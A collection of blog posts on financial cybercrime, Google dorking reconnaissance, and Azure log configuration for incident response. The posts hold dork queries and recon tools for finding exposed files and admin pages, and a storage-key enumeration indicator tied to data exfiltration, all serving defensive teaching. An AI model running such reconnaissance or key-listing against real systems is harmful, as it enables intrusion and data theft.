
  • Cyber Crime: A Focus on Financial Gain (Zeus Trojan, Emotet Trojan, Carbanak)

    Monetary Gain as the Core Driver of Cybercrime

    Cybercriminals are motivated by financial profit, making their targets somewhat predictable: they go where the money is. These attackers prefer low-effort, high-reward methods and often avoid challenging targets. A classic saying summarizes their approach: “You don’t have to be the fastest; just don’t be the slowest.”

    Common Attack Techniques in Financial Cybercrime

    1. Online Banking Trojans
    Banking Trojans target online banking users, aiming for mass infections and small-value thefts. Notable examples include:
    - Zeus, Citadel, Emotet, and Dridex: These Trojans infect users’ devices to steal small amounts of money from each infected account.
    - POS and ATM Malware: Tailored malware targeting point-of-sale systems and ATMs to steal data and cash.

    2. Advanced Attacks Against Financial Institutions
    Criminals also target banks directly, infecting business users involved in handling large fund transfers:
    - Carbanak Attack (2015): Cybercriminals infiltrated bank networks, learned fund transfer procedures, and stole millions.
    - Bangladesh Bank Heist (2016): Attackers exploited the SWIFT system in an attempted theft of $951 million.

    3. Targeted Ransomware
    Since 2015, ransomware has surged, targeting any entity that values its data:
    - Victims: From individuals to corporations and government bodies, anyone with data worth protecting is a potential target if they are willing to pay to retrieve it.

    Key Online Banking Trojans

    Zeus Trojan: The "King" of Banking Malware
    - Overview: Zeus, a versatile Trojan, performs various attacks, including keylogging and "man-in-the-browser" (MitB) attacks, which intercept and manipulate data in a user’s browser.
    - Tech Support Scams: Zeus also supported fake virus warnings, leading users to pay for fraudulent antivirus services.
    - Open-Source Adaptation: In 2011, Zeus’s source code was leaked, giving rise to many new variants such as Citadel.
    - ZitMo (Zeus-in-the-Mobile): This mobile version intercepts authentication codes to facilitate fraudulent transactions.

    Emotet Trojan: Evolving Financial Malware
    - First Identified (2014): Initially, Emotet bypassed security to steal banking credentials, later evolving with features like self-propagation through email.
    - Infection via Spam: Emotet spreads via email with malicious Office documents, often disguised as invoices or delivery notices.
    - Notable Attack (2019): In Lake City, Florida, Emotet infected the city’s network, later dropping TrickBot and leading to Ryuk ransomware deployment, resulting in a $460,000 ransom payment.

    Carbanak: The First APT Against Banks
    - Discovery (2015): Carbanak, an APT (Advanced Persistent Threat) campaign, targeted financial institutions, amassing $500 million through fraudulent transactions.
    - Attack Method: Phishing emails with malicious attachments led to malware installation, allowing remote control and surveillance of bank operations.
    - Techniques: The Carbanak gang learned banking procedures by recording screens and keystrokes, enabling them to conduct transactions themselves.
    - Cash-Out Techniques: These included programming ATMs to dispense cash on command, transferring funds to mule accounts, manipulating the SWIFT network, and creating fake bank accounts.
    - Summary of Financial Losses: Carbanak alone caused losses of up to $10 million per institution, potentially totaling $1 billion across all affected banks.

    In the next article we will cover the Bangladesh Bank heist via the SWIFT network in depth. Until then, stay safe and keep learning!

  • How Attackers Use Search Engines and What You Can Do About It

    Search engines are incredible tools for finding information online, but they can also be used by attackers for reconnaissance.

    How Attackers Use Search Engines for Reconnaissance

    Search engines like Google and Bing provide a vast amount of information that attackers can exploit. By using specific search commands, they can uncover sensitive data, find vulnerabilities, and prepare for attacks.

    Google Hacking Database (GHDB): The Google Hacking Database (GHDB) is a collection of search queries that help find vulnerabilities and sensitive data exposed by websites. It is a valuable resource for attackers and can be found on the Exploit Database website.
    https://www.exploit-db.com/google-hacking-database

    Key Search Commands Attackers Use
    - site: Restricts the search to a specific domain. Example: site:example.com restricts results to example.com.
    - link: Finds websites linking to a specific page. Example: link:example.com shows sites linking to example.com.
    - intitle: Searches for pages with specific words in the title. Example: intitle:"login page" finds pages with "login page" in the title.
    - inurl: Looks for URLs containing specific words. Example: inurl:admin finds URLs with "admin" in them.
    - related: Finds pages related to a specific URL. Often less useful, but can sometimes uncover valuable information.
    - cache: Accesses the cached version of a webpage stored by Google. Example: cache:example.com shows Google’s cached copy of example.com.
    - filetype:/ext: Searches for specific file types. Example: filetype:pdf or ext:pdf finds PDF files, useful for locating documents that might contain sensitive information.

    Practical Reconnaissance Techniques

    1. Searching for Sensitive Files
    Attackers search for files that might be accidentally exposed, such as:
    - Web content: site:example.com asp, site:example.com php
    - Document files: site:example.com filetype:xls, site:example.com filetype:pptx

    2. Using Cache and Archives
    - Google Cache: Retrieves recently removed pages using the cache: command.
    - Wayback Machine: Archives webpages over time, available at archive.org.
    https://archive.org/

    3. Automated Tools
    - FOCA/Goca: Finds files, downloads them, and extracts metadata, revealing usernames, software versions, and more.
    https://github.com/gocaio/Goca
    - SearchDiggity: Provides modules for Google, Bing, and Shodan searches, malware checks, and data leakage assessments.
    - Recon-ng: A framework that queries data from multiple services and manages data across projects.
    https://github.com/lanmaster53/recon-ng

    Conclusion

    Search engine reconnaissance is a powerful technique for attackers, providing them with a wealth of information to plan their attacks. By understanding these techniques and implementing robust defensive measures, you can significantly reduce your exposure and protect your critical data. Stay vigilant, stay informed, and continuously audit your public-facing assets to maintain a strong security posture.

    Akash Patel
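Defenders can reuse the same operators to audit their own footprint. Below is a minimal sketch that assembles dork queries for a domain; the `build_dorks` helper and the target domain are illustrative, not part of any official tool.

```python
# Sketch: assemble Google dork queries for auditing your own domain.
# The operator strings mirror those described above.

def build_dorks(domain):
    """Return a list of search queries for exposed files and pages on a domain."""
    file_types = ["pdf", "xls", "pptx", "docx"]
    dorks = [f"site:{domain} filetype:{ft}" for ft in file_types]
    dorks.append(f'site:{domain} intitle:"login page"')
    dorks.append(f"site:{domain} inurl:admin")
    return dorks

for query in build_dorks("example.com"):
    print(query)
```

Running each query manually (or via a tool such as Recon-ng) shows what a casual attacker would see about your domain.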

  • Azure (Virtual Machine Logs): A Guide for IR

    Let's talk about the fifth category: Virtual Machine Logs.

    Azure provides a range of logging options for virtual machines (VMs) to support monitoring, troubleshooting, and incident response. Here's an overview of the log types, agents, and configuration options for both Windows and Linux VMs, along with specific considerations for application logs.

    Logging Agents

    Azure offers several agents for collecting VM logs, each suited to different needs:
    - Azure Monitor Agent: Designed to replace older agents, it supports Data Collection Rules (DCR) for granular log collection.
    - Diagnostic Extension (WAD): Known as Windows Azure Diagnostics, this agent can write data directly to a storage account or an Event Hub. It remains a go-to choice for direct storage integration.
    - Azure Monitor for VMs: Collects performance data and logs across VMs but may require additional configuration for more specialized needs.

    For data retention in Azure, understanding which agent best aligns with your storage and monitoring requirements is key.

    Configuring Windows Azure Diagnostics (WAD) for Windows VMs

    Initial Setup:
    - Navigate to Azure Monitor in the Azure portal.
    - Create a Data Collection Rule (DCR) for specific logs.

    Configuration Steps:
    - Diagnostic Settings: Configure diagnostic settings for the VM and select the event logs and levels you want to collect (e.g., system, security, and application logs).
    - Agent Settings: Assign a storage account to store the logs and set a disk quota to manage storage limits.

    Types of Logs Collected:
    - Windows Event Logs: Stored in WADWindowsEventLogsTable, which contains OS-level event logs.
    - Application Logs: Capture IIS logs, .NET application traces, and Event Tracing for Windows (ETW) events. ETW provides insights into kernel and application-level events, useful for performance and security monitoring.
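Event logs collected this way can later be exported to .csv (for example via Azure Storage Explorer) and triaged with a short script. The sketch below is a minimal example; the column names (ProviderName, EventId, Level) and the sample rows are assumptions about the export format, so adjust them to match your actual file.

```python
# Sketch: filter a CSV export of WADWindowsEventLogsTable for high-severity
# events. Column names here are assumptions about the export, not a
# documented schema.
import csv
import io

SAMPLE = """ProviderName,EventId,Level
Microsoft-Windows-Security-Auditing,4625,2
Service Control Manager,7036,4
"""

def high_severity_events(csv_text, max_level=3):
    """Return rows whose numeric Level is at or below max_level (lower = more severe)."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return [row for row in reader if int(row["Level"]) <= max_level]

for event in high_severity_events(SAMPLE):
    print(event["ProviderName"], event["EventId"])
```

In practice you would point the same function at the file you exported from the storage table instead of the inline sample.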
    Accessing Logs:
    - Azure Storage Explorer: Use this tool to navigate to the storage account's Tables section, access WADWindowsEventLogsTable, and export logs to a .csv file if needed.

    Configuring Logging for Linux VMs

    Diagnostic Settings:
    - Set diagnostic settings for the Linux VM, similar to the Windows setup.
    - Choose the target storage account for log storage.

    Log Options:
    - Metrics: Configure metrics for key system parameters such as CPU, memory, network, file system, and disk usage. These can indicate suspicious activity patterns, such as high CPU usage for crypto mining or elevated disk usage during ransomware incidents.
    - Syslog: Collect system logs stored in auth.log, kern.log, syslog, etc. All logs are combined into a single table, LinuxSyslogVer2v0, in the Azure storage account.
    https://datatracker.ietf.org/doc/html/rfc5424

    Accessing Linux Logs:
    - Use Azure Storage Explorer to access LinuxSyslogVer2v0 under the Tables section of the designated storage account.

    Application Logging

    Tracing for .NET and ETW: Application logs generated from .NET applications and ETW (Event Tracing for Windows) capture both system and application performance data. These logs are stored in plaintext, differing from other logs stored in JSON format, and can be accessed via Azure's storage services.

    -------------------------------------------------------------------------------------------------------------

    Summary of Log Sources
    - Windows VMs: Windows event logs (WADWindowsEventLogsTable); IIS and application logs; ETW events
    - Linux VMs: System metrics (CPU, memory, etc.); Syslog events (LinuxSyslogVer2v0)
    - Application Logs: .NET tracing output and ETW logs in plaintext

    --------------------------------------------------------------------------------------------------------

    Key Takeaways
    - Choosing Agents: Decide based on whether storage account integration or advanced data collection rules are required.
    - Logging Setup: Configure storage quotas to avoid excessive costs and log noise.
    - Accessing Logs: Use Azure Storage Explorer for NoSQL table-based logs, which provide structured access to Windows and Linux logs.

    ------------------------------------------------------------------------------------------------------

    Conclusion

    In Azure, securing storage accounts and virtual machines requires vigilant access management, policy-driven logging, and careful monitoring of data access activities. By enabling StorageRead logs and configuring diagnostic agents for VMs, organizations can detect potential data exfiltration and unusual activity. Centralizing logs and applying policies across environments strengthens incident response and supports comprehensive visibility across resources.

    Akash Patel

    ----------------------------------------------------------------------------------------------------------

    Special Thanks (Iqra)

    I would like to extend my heartfelt gratitude to one of my dearest colleagues, a Microsoft Certified Trainer, for her invaluable assistance in creating these articles. Without her support, this would not have been possible. Thank you so much for your time, expertise, and dedication!
    https://www.linkedin.com/in/iqrabintishafi/

    -------------------------------------------------------------------------------------------------------------

  • Azure (NSG/Storage Account Logs): A Guide for IR

    Let's talk about the third category: Resource Logs.

    Azure offers a variety of logging resources to support incident response, monitoring, and security analytics. Two key components are Network Security Group (NSG) Flow Logs and Traffic Analytics, essential tools for analyzing network activity and identifying potential security incidents in your Azure environment.
    https://learn.microsoft.com/en-us/azure/azure-monitor/reference/logs-index

    Key Components of Azure Network Security

    Network Security Groups (NSG):
    - NSGs control network traffic flow to and from Azure resources through security rules.
    - Rules specify the source, destination, port, and protocol, either allowing or denying traffic.
    - Rules are prioritized numerically, with lower numbers having higher priority.
    https://learn.microsoft.com/en-us/azure/network-watcher/nsg-flow-logs-overview

    NSG Flow Logs:
    Flow logs capture important network activity at the transport layer (Layer 4) and are a vital resource for tracking and analyzing network traffic. They include:
    - Source and destination IP, ports, and protocol: This 5-tuple information helps identify connections and patterns.
    - Traffic decision (Allow or Deny): Specifies whether traffic was permitted or blocked.
    - Logging frequency: Flow logs are captured every minute.
    - Storage: Logs are stored in JSON format, retained for a year, and can be configured to stream to Log Analytics or an Event Hub for SIEM integration.

    Note: NSG flow logs are enabled through the Network Watcher service, which must be enabled for each region in use.

    NSG Flow Log Configuration

    To enable NSG flow logs:
    1. Enable Network Watcher: Set up in each Azure region where NSG monitoring is needed.
    2. Register the Microsoft.Insights provider: The "Insights" provider enables log capture and must be registered for each subscription.
    3. Enable NSG flow logs: Use version 2 for enhanced details, including throughput information.
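Once flow logs are enabled, each JSON record carries its network data as comma-separated flow tuples. The sketch below pulls the 5-tuple and the allow/deny decision out of a single version 2 tuple; the field order follows the documented v2 layout (timestamp, source/destination IP and port, protocol, direction, decision, flow state, counters), but treat it as an assumption and verify it against your own logs.

```python
# Sketch: parse one NSG flow log (version 2) flow tuple.
# Field positions are based on the documented v2 layout and should be
# verified against real log output before use.

def parse_flow_tuple(tuple_str):
    fields = tuple_str.split(",")
    return {
        "timestamp": fields[0],
        "src_ip": fields[1],
        "dst_ip": fields[2],
        "src_port": fields[3],
        "dst_port": fields[4],
        "protocol": fields[5],   # T = TCP, U = UDP
        "direction": fields[6],  # I = inbound, O = outbound
        "decision": fields[7],   # A = allowed, D = denied
    }

# Hand-made example tuple (not real log data)
flow = parse_flow_tuple("1542110377,10.0.0.4,203.0.113.9,44931,443,T,O,A,B,,,,")
print(flow["src_ip"], "->", flow["dst_ip"], flow["decision"])
```

Iterating this parser over every tuple in the log's records lets you count denied flows per source IP, a quick first pass when hunting for scanning activity.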
    https://learn.microsoft.com/en-us/azure/network-watcher/nsg-flow-logs-tutorial
    https://learn.microsoft.com/en-us/azure/network-watcher/traffic-analytics

    ---------------------------------------------------------------------------------------------------------

    Traffic Analytics

    Traffic Analytics is a powerful tool that enhances NSG flow logs by providing a visual representation and deeper insights into network activity. By using a Log Analytics workspace, it allows organizations to:
    - Visualize network activity: Easily monitor traffic patterns across subscriptions.
    - Identify security threats: Detect unusual traffic patterns that could signify attacks or unauthorized access.
    - Optimize network deployment: Analyze traffic flows to adjust resource configurations for efficiency.
    - Pinpoint misconfigurations: Quickly identify and correct settings that might expose resources to risk.

    Setup: Traffic Analytics is configured via Network Watcher and requires the NSG logs to be sent to a Log Analytics workspace.

    ---------------------------------------------------------------------------------------------------------

    Practical Applications in Incident Response and Forensics

    For incident response, NSG flow logs and Traffic Analytics provide a detailed view into Azure network activity, allowing you to:
    - Track unusual or unauthorized traffic patterns.
    - Quickly spot and investigate potential lateral movement within the network.
    - Assess security posture by reviewing allowed and denied traffic flows, helping ensure configurations align with security policies.

    ---------------------------------------------------------------------------------------------------------

    Now let's talk about the fourth category: Storage Account Logs.

    In Azure, storage accounts are crucial resources for storing and managing data, but they require specific configurations to secure access and enable effective monitoring through logs.
    Here's a breakdown of key practices for setting up and securing storage accounts in Azure:

    Enabling Storage Account Logs

    Azure does not enable logging for storage accounts by default, but you can enable logs through two main options:
    - Diagnostic Settings – Preview: This is the preferred option, offering granular logging settings. Logs can be configured for each data type (blob, queue, table, and file storage) and sent to various destinations such as a Log Analytics workspace, another storage account, an Event Hub, or a partner solution.
    - Diagnostic Settings – Classic: An older option with limited customization compared to the preview settings.

    Logging Categories: Logs can capture Read, Write, and Delete operations. For security and forensic purposes, it is especially important to enable the StorageRead log to track data access, as this can help detect data exfiltration attempts (e.g., when sensitive data is downloaded from a blob).

    Key Logging Considerations for Security
    - Data Exfiltration Tracking: Monitoring Read operations is critical for detecting unauthorized data access. Filtering for specific operations, such as GetBlob, allows you to identify potential data exfiltration activities.
    - Microsoft Threat Matrix: Azure's threat matrix for storage, based on the MITRE ATT&CK framework, highlights data exfiltration as a significant risk. Monitoring for this by configuring relevant logs helps mitigate data theft.
    https://www.microsoft.com/en-us/security/blog/2021/04/08/threat-matrix-for-storage/

    ---------------------------------------------------------------------------------------------------------

    Storage Account Access Controls

    Access to storage accounts can be configured at multiple levels:
    - Account level: Overall access to the storage account itself.
    - Data level: Specific containers, file shares, queues, or tables.
    - Blob level: Individual blob (object) access, allowing the most restrictive control.
    Access Keys: Each storage account comes with two access keys. Regular rotation of these keys is highly recommended to maintain security.

    Shared Access Signatures (SAS): SAS tokens allow restricted access to resources for a limited time and are a safer alternative to account keys, which grant broader access. SAS tokens can be scoped down to individual blobs for more restrictive control.

    Public Access: It is critical to avoid public access configurations unless absolutely necessary, as they can expose sensitive data to unauthorized users.

    ---------------------------------------------------------------------------------------------------------

    Internet Access and Network Security for Storage Accounts

    By default, Azure storage accounts are accessible over the internet, which poses security risks:
    - Global access: Storage accounts exist in a global namespace, making them accessible worldwide via a URL (e.g., https://mystorageaccount.blob.core.windows.net). Restricting access to specific networks or enabling a private endpoint is recommended to limit exposure.
    - Private Endpoints and Azure Private Link: For enhanced security, private endpoints can be used to connect securely to a storage account via Azure Private Link. This setup requires advanced planning but significantly reduces the risk of unauthorized internet access.
    - Network Security Groups (NSG): Although NSGs do not directly control storage account access, securing the virtual networks and subnets associated with storage accounts is essential.

    Best Practices for Incident Response and Forensics

    For effective incident response:
    - Enable and monitor diagnostic logs for Read operations to detect data exfiltration.
    - Regularly review access control configurations to ensure minimal exposure.
    - Use private endpoints and avoid public access settings to minimize risk from the internet.
    These configurations and controls enhance Azure storage security, protecting sensitive data from unauthorized access and improving overall network resilience.

    ---------------------------------------------------------------------------------------------------------

    In Azure, protecting against data exfiltration in storage accounts requires a layered approach: strict control over key and SAS token generation, careful monitoring of access patterns, and policies that enforce logging for audit and response purposes. Here's a detailed breakdown:

    Data Exfiltration Prevention and Monitoring

    Key and SAS Management

    Key Generation: Access keys and SAS tokens are critical for accessing data in storage accounts and can be generated through various methods:
    - Azure Console: Provides an intuitive UI for key generation and monitoring.
    - PowerShell and CLI: Useful for scripting automated key management tasks.
    - Graph API: Suitable for integrating key management into custom applications or workflows.

    For example:
    - Access Keys: Azure generates two access keys per storage account to allow for seamless key rotation.
    - Shared Access Signatures (SAS): SAS tokens can be generated at different levels (blob, file service, queue, and table), granting temporary, limited access. Generating SAS tokens at the most granular level, such as for individual blobs, reduces the risk of misuse.

    Monitoring Key Enumeration: To detect potential data exfiltration, look for specific operations that indicate credential enumeration:
    - LISTKEYS/ACTION operation: Any instance of "operationName": "MICROSOFT.STORAGE/STORAGEACCOUNTS/LISTKEYS/ACTION" in the logs indicates that a principal has listed the keys. This is a red flag, as unauthorized access to these keys could enable data exfiltration.

    Configuring Applications for Secure Access

    Once a threat actor obtains storage credentials, it becomes straightforward to access and exfiltrate data through applications like Azure Storage Explorer.
    This tool allows quick configuration using access keys or SAS tokens, so it is vital to:
    - Limit key distribution: Only authorized users should have access to SAS tokens or keys, ideally with restricted permissions and limited expiry.
    - Enable StorageRead logs: The StorageRead log captures read activities, providing visibility into data access. If this log is not enabled, data exfiltration activity goes undetected.

    Automating Log Enabling with Policies

    For organizations with extensive storage account usage, enabling StorageRead logs on each account individually can be infeasible. To streamline this, you can:
    - Create a policy for storage logs: Set a policy at the management group or subscription level to automatically enable logs for all current and future storage accounts.
    - Predefined policies: Azure offers several predefined policies, but currently none enforce storage account logging by default.
    - Custom policy: If needed, a custom policy can be created (e.g., to enable StorageRead logging and direct logs to an Event Hub, a Log Analytics workspace, or other storage). This policy can ensure storage accounts remain compliant with logging requirements.

    Policy Constraints and Configuration:
    - Regional limitation: When configuring a policy to send logs to an Event Hub, both the Event Hub and the storage account must be in the same region. To capture logs across multiple regions, create corresponding Event Hubs.
    - Flexible destinations: Customize the policy to send logs to various destinations, such as Log Analytics or a storage account, depending on organizational needs.
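The LISTKEYS/ACTION indicator described earlier can be hunted for with a few lines of code once activity logs are exported as JSON. Below is a minimal sketch; the entries are hand-made imitations of the activity-log schema, and `find_key_listings` is a hypothetical helper, not part of any Azure SDK.

```python
# Sketch: scan exported Azure Activity Log entries (JSON) for storage key
# enumeration. The sample entries are illustrative, not real log output.
import json

LOGS = json.loads("""[
  {"operationName": "MICROSOFT.STORAGE/STORAGEACCOUNTS/LISTKEYS/ACTION",
   "caller": "user@example.com", "callerIpAddress": "203.0.113.7"},
  {"operationName": "MICROSOFT.COMPUTE/VIRTUALMACHINES/START/ACTION",
   "caller": "admin@example.com", "callerIpAddress": "198.51.100.2"}
]""")

def find_key_listings(entries):
    """Return entries where a principal enumerated storage account keys."""
    return [e for e in entries
            if e.get("operationName", "").upper().endswith("/LISTKEYS/ACTION")]

for hit in find_key_listings(LOGS):
    print(hit["caller"], hit["callerIpAddress"])
```

Any hit from an unexpected principal or IP address warrants immediate key rotation and a review of StorageRead logs for follow-on data access.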
    ---------------------------------------------------------------------------------------------------------

    We will continue in the next blog. Until then, stay safe and keep learning.

    Akash Patel

    ----------------------------------------------------------------------------------------------------------

    Special Thanks (Iqra)

    I would like to extend my heartfelt gratitude to one of my dearest colleagues, a Microsoft Certified Trainer, for her invaluable assistance in creating these articles. Without her support, this would not have been possible. Thank you so much for your time, expertise, and dedication!
    https://www.linkedin.com/in/iqrabintishafi/

    -------------------------------------------------------------------------------------------------------------

  • Azure (Tenant/Subscription Logs): A Guide for Incident Response

    While the Log Analytics workspace is an excellent tool for monitoring and analyzing logs in Azure, storing logs in a storage account provides a more cost-effective and flexible solution for long-term retention and external access. This setup allows organizations to store logs for extended periods and export them for integration with other tools or services.

    Why Export Logs to a Storage Account?

    There are several benefits to exporting tenant logs and other Azure logs to a storage account:
    - Long-term retention: You can define a retention policy to keep logs for months or years, depending on compliance and operational requirements.
    - Cost efficiency: Compared to storing everything in a Log Analytics workspace, which is more costly for extensive data, storage accounts offer a lower-cost alternative for long-term log retention.
    - Accessibility: Logs stored in a storage account can be accessed through APIs or via tools like Azure Storage Explorer, allowing easy download, transfer, and external analysis.

    However, each organization must balance storage needs with costs, as larger volumes of data will increase storage costs over time.

    -------------------------------------------------------------------------------------------------------------

    Steps to Export Tenant Logs to a Storage Account

    Step 1: Set Up Diagnostic Settings to Export Logs
    1. Navigate to Diagnostic Settings: In the Azure portal, search for Azure Active Directory and select it. Under the Monitoring section, select Diagnostic settings.
    2. Create a new diagnostic setting: Click Add diagnostic setting and name your setting (e.g., "TenantLogStorageExport").
    3. Select log categories: Choose the logs you want to export, such as Audit Logs, Sign-in Logs, and Provisioning Logs.
    4. Select destination: Choose Archive to a storage account and select the storage account where the logs will be stored. Confirm and save the settings.
    Once configured, the selected logs will start streaming into the specified storage account.

    -------------------------------------------------------------------------------------------------------------

    Accessing Logs with Azure Storage Explorer

    Azure Storage Explorer is a free, graphical tool that allows you to easily access and manage data in your storage accounts, including logs stored as blobs.

    Using Azure Storage Explorer:
    1. Download and install: Install Azure Storage Explorer on your local machine.
    2. Connect to your Azure account: Launch Storage Explorer and sign in with your Azure credentials. Browse to your storage account and locate the blobs where your logs are stored (e.g., insights-logs-signinlogs).
    3. View and download logs: Use the explorer interface to view the logs. You can download these blobs to your local machine for offline analysis, or automate log retrieval using tools like AzCopy or Python scripts.

    Logs are typically stored in a hierarchical structure, with each log file containing valuable data in JSON or CSV format.

    Examples of Log Types in Storage Accounts

    Here are some common logs that you might store in your storage account:
    - insights-logs-signinlogs: Logs of all user and service sign-in activities.
    - insights-logs-auditlogs: Logs of administrative changes such as adding or removing users, apps, or roles.
    - insights-logs-networksecuritygrouprulecounter: Tracks network security group rules and counters.
    - insights-logs-networksecuritygroupflowevent: Monitors NSG traffic flows.

    These logs are stored as blobs, while certain logs (e.g., OS logs) might be stored in tables within the storage account.
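A downloaded sign-in blob can be summarized with a short script. The sketch below assumes one JSON record per line, with userPrincipalName and ipAddress nested under a properties object; those field names are assumptions about the export format, so verify them against a real blob before relying on the script.

```python
# Sketch: count sign-in events per user from a downloaded
# insights-logs-signinlogs blob. The sample blob below is hand-made.
import json
from collections import Counter

SAMPLE_BLOB = "\n".join([
    json.dumps({"properties": {"userPrincipalName": "alice@example.com", "ipAddress": "203.0.113.5"}}),
    json.dumps({"properties": {"userPrincipalName": "alice@example.com", "ipAddress": "203.0.113.5"}}),
    json.dumps({"properties": {"userPrincipalName": "bob@example.com", "ipAddress": "198.51.100.9"}}),
])

def sign_ins_per_user(blob_text):
    """Tally sign-in records by user principal name."""
    counts = Counter()
    for line in blob_text.splitlines():
        if line.strip():
            record = json.loads(line)
            counts[record["properties"]["userPrincipalName"]] += 1
    return counts

print(sign_ins_per_user(SAMPLE_BLOB))
```

The same pattern extends naturally to tallying by ipAddress, which is often the faster route to spotting sign-ins from unexpected locations.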
    https://azure.microsoft.com/en-us/products/storage/storage-explorer/
    https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/activity-log-schema#schema-from-storage-account-and-event-hubs

    -------------------------------------------------------------------------------------------------------------

    Sending Logs to Event Hub for External Systems

    If you need to export tenant logs or other logs to a non-Azure system, Event Hub is a great option. Event Hub is a real-time data ingestion service that can process millions of events per second and is often used to feed external systems such as SIEMs (Security Information and Event Management).

    How to Configure Event Hub Export:
    1. Create an Event Hub: Set up an Event Hub within the Azure Event Hubs service.
    2. Configure diagnostic settings: Just as you did for the storage account, go to Diagnostic settings for Azure Active Directory and select Stream to an event hub as the destination. Enter the namespace and event hub name.

    This setup allows you to forward Azure logs in real time to any system capable of receiving data from Event Hub, such as a SIEM or a custom log analytics platform.
    https://azure.microsoft.com/en-us/products/event-hubs/
    https://learn.microsoft.com/en-us/entra/identity/monitoring-health/howto-stream-logs-to-event-hub?tabs=splunk

    -------------------------------------------------------------------------------------------------------------

    Leveraging Microsoft Graph API for Log Retrieval

    In addition to storage accounts and Event Hubs, Azure also supports the Microsoft Graph API for retrieving tenant logs programmatically. This API allows you to pull log data directly from Azure and Microsoft 365 services. The Graph API supports many programming languages, including Python, C#, and Node.js, making it highly flexible. It is commonly used to integrate Azure logs into custom applications or third-party systems.
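To make the Graph option concrete, here is a sketch that only constructs the request URL for the sign-in log endpoint (auditLogs/signIns in Graph v1.0). The filter value and user are illustrative; in practice you would also obtain an OAuth bearer token and send the request with an HTTP client, which is omitted here.

```python
# Sketch: build (but do not send) a Microsoft Graph request URL for
# sign-in logs filtered to one user. Token handling and the HTTP call
# are intentionally left out.
from urllib.parse import urlencode

GRAPH_BASE = "https://graph.microsoft.com/v1.0"

def signin_query_url(user_principal_name):
    """Return the Graph URL querying sign-ins for a given user."""
    params = {"$filter": f"userPrincipalName eq '{user_principal_name}'"}
    return f"{GRAPH_BASE}/auditLogs/signIns?{urlencode(params)}"

print(signin_query_url("alice@example.com"))
```

Sending this request requires an app registration with the appropriate audit-log read permission granted in the tenant.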
    https://developer.microsoft.com/en-us/graph

    -------------------------------------------------------------------------------------------------------------

    All of the above logs are part of the tenant logs. Let's move on to the second log category: Subscription Logs.

    What are Subscription Logs?

    Subscription logs track and record all activities within your Azure subscription. They record changes made to resources, providing a clear audit trail and insight into tenant-wide services. The primary information recorded includes details on operations, identities involved, success or failure status, and IP addresses.

    Accessing Subscription Logs

    Subscription logs are available under the Activity log in the Azure portal. You can use the logs in multiple ways:
    - View them directly in the Azure portal for a quick, interactive inspection.
    - Store them in a Log Analytics workspace for advanced querying and long-term retention.
    - Archive them in a storage account, useful for maintaining a long-term log history.
    - Forward them to a SIEM (Security Information and Event Management) solution via Azure Event Hub for enhanced security monitoring and correlation.

    To access the logs in the Azure portal, use the search bar to look for Activity log. This will provide a quick summary view of activities within the portal.
    https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/activity-log?tabs=powershell

    -------------------------------------------------------------------------------------------------------------

    Key Elements of the Subscription Log Schema

    Each activity log entry has several key fields that can help in monitoring and troubleshooting. When an action, such as creating a new virtual machine (VM), is logged, the following fields provide detailed information:
    - resourceId: A unique identifier for the resource that was acted upon, allowing precise tracking of the specific VM, storage account, or network security group.
    - operationName: Specifies the action taken on the resource. For example, creating a VM might appear as MICROSOFT.COMPUTE/VIRTUALMACHINES/WRITE.
    - resultType and resultSignature: Show whether the operation succeeded, failed, or was canceled, with additional error codes or success indicators in resultSignature.
    - callerIpAddress: The IP address from which the action originated, identifying the source of the request.
    - correlationId: A unique GUID that ties together all sub-operations in a single request, allowing you to trace a sequence of actions as part of a single change or request.
    - claims: Contains identity details of the principal making the change, including any associated authentication data. This can include fields from an identity provider like Azure AD, giving insight into the user or service making the request.

    Each log entry captures critical details that aid in understanding who, what, when, and where changes were made.

    -------------------------------------------------------------------------------------------------------------

    Subscription Log Access Options

    Azure offers different access and filtering methods for subscription logs. Here's a breakdown of how you can use them effectively:
    - Azure portal: The Azure portal offers a quick, visual way to explore logs. You can select a subscription, set the event severity level (e.g., Critical, Error, Warning, Informational), and define a timeframe for the log entries you need. The Export Activity Logs option on the top menu or the Diagnostic Settings on the left allows you to set up data export or view diagnostic logs.
    - Log Analytics workspace: The Log Analytics workspace offers a more robust and flexible environment for log analysis. By sending your logs here, you can perform advanced queries, create dashboards, and set up alerts. This workspace enables centralized log management, making it an ideal choice for larger organizations or those with specific compliance requirements.
Programmatic Access : Using the PowerShell cmdlet Get-AzLog or the Azure CLI with az monitor activity-log, you can query the activity logs programmatically. This is useful for automated scripts or for integrating logs into third-party solutions.
Event Hub Integration : For real-time analysis, integrate subscription logs with Event Hub and forward them to a SIEM for security insights and anomaly detection. This setup is beneficial for organizations that require constant monitoring and incident response.
https://learn.microsoft.com/en-us/powershell/module/az.monitor/?view=azps-12.4.0#retrieve-activity-log
https://learn.microsoft.com/en-us/cli/azure/service-page/monitor?view=azure-cli-latest#view-activity-log
-------------------------------------------------------------------------------------------------------------
Subscription Logs in Log Analytics workspace
For detailed analysis, it's best to set up a Log Analytics workspace. This enables centralized log storage and querying capabilities, combining subscription logs with other logs (such as Azure Active Directory (Entra ID) logs) for a comprehensive view. The setup process is identical to the one for the tenant logs: select the log categories you wish to save and the Log Analytics workspace to send them to.
Subscription Log Categories
The main log categories available are:
Administrative : Tracks actions related to resources, such as creating, updating, or deleting resources via Azure Resource Manager.
Security : Logs security alerts generated by Azure Security Center.
Service Health : Reports incidents affecting the health of Azure services.
Alert : Logs triggered alerts based on predefined metrics, such as high CPU usage.
Recommendation : Records Azure Advisor recommendations for resource optimization.
Policy : Logs policy events for auditing and enforcing subscription-level policies.
Autoscale : Contains events from the autoscale feature based on usage settings.
Resource Health : Provides resource health status, indicating whether a resource is available, degraded, or unavailable. ------------------------------------------------------------------------------------------------------------- Querying Subscription Logs in Log Analytics The logs are stored in the AzureActivity table in Log Analytics . Here are some example queries: Identify Deleted Resources : AzureActivity | where OperationNameValue contains "DELETE" This query is useful for investigating deletions, such as a scenario where a malicious actor deletes a resource group, causing all contained resources to be deleted. Track Virtual Machine Operations : AzureActivity | where OperationNameValue contains "COMPUTE" | distinct OperationNameValue This query lists unique operations related to virtual machines, helpful for getting an overview of VM activity. Count VM Operations : AzureActivity | where OperationNameValue contains "COMPUTE" | summarize count() by OperationNameValue By counting operations, this query provides insights into the volume of VM activities, which can reveal patterns such as frequent VM creation or deletion. ------------------------------------------------------------------------------------------------------------- Archiving and Streaming Logs To save logs for long-term storage or send them to a SIEM: Configure diagnostic settings to specify the storage account or Event Hub for 